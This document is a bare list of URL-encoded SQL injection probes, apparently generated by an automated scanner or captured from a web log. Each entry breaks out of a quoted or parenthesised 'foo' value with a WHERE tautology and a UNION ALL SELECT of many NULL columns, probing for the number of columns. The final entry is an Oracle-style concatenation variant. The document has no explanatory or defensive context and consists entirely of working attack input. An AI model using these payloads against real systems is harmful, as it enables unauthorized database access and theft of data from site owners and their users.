foo%27%29%20WHERE%206787%3D6787%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%209423%3D9423%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%201952%3D1952%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%205569%3D5569%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%205790%3D5790%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%209008%3D9008%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%202261%3D2261%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20WHERE%208260%3D8260%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%208762%3D8762%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%202957%3D2957%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%202950%3D2950%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%209878%3D9878%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%209348%3D9348%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%201905%3D1905%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%208549%3D8549%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%207880%3D7880%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%29%20WHERE%206474%3D6474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%204520%3D4520%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%208867%3D8867%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%206280%3D6280%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%202209%3D2209%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201537%3D1537%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%208664%3D8664%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%203003%3D3003%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%206897%3D6897%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%207477%3D7477%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20WHERE%201837%3D1837%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206126%3D6126%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206530%3D6530%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206722%3D6722%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204452%3D4452%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%203829%3D3829%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%206014%3D6014%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%203656%3D3656%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204807%3D4807%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%204957%3D4957%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%20WHERE%205515%3D5515%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%207496%3D7496%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%201152%3D1152%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203829%3D3829%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203059%3D3059%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%202698%3D2698%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203680%3D3680%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%203155%3D3155%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%204864%3D4864%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%209073%3D9073%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%22%20WHERE%202560%3D2560%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%208438%3D8438%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%201450%3D1450%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%204244%3D4244%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%202005%3D2005%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%204077%3D4077%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%207602%3D7602%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%203055%3D3055%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%202957%3D2957%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%202196%3D2196%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%20WHERE%205341%3D5341%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%7C%7C%28SELECT%20%27tKwW%27%20FROM%20DUAL%20WHERE%208264%3D8264%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 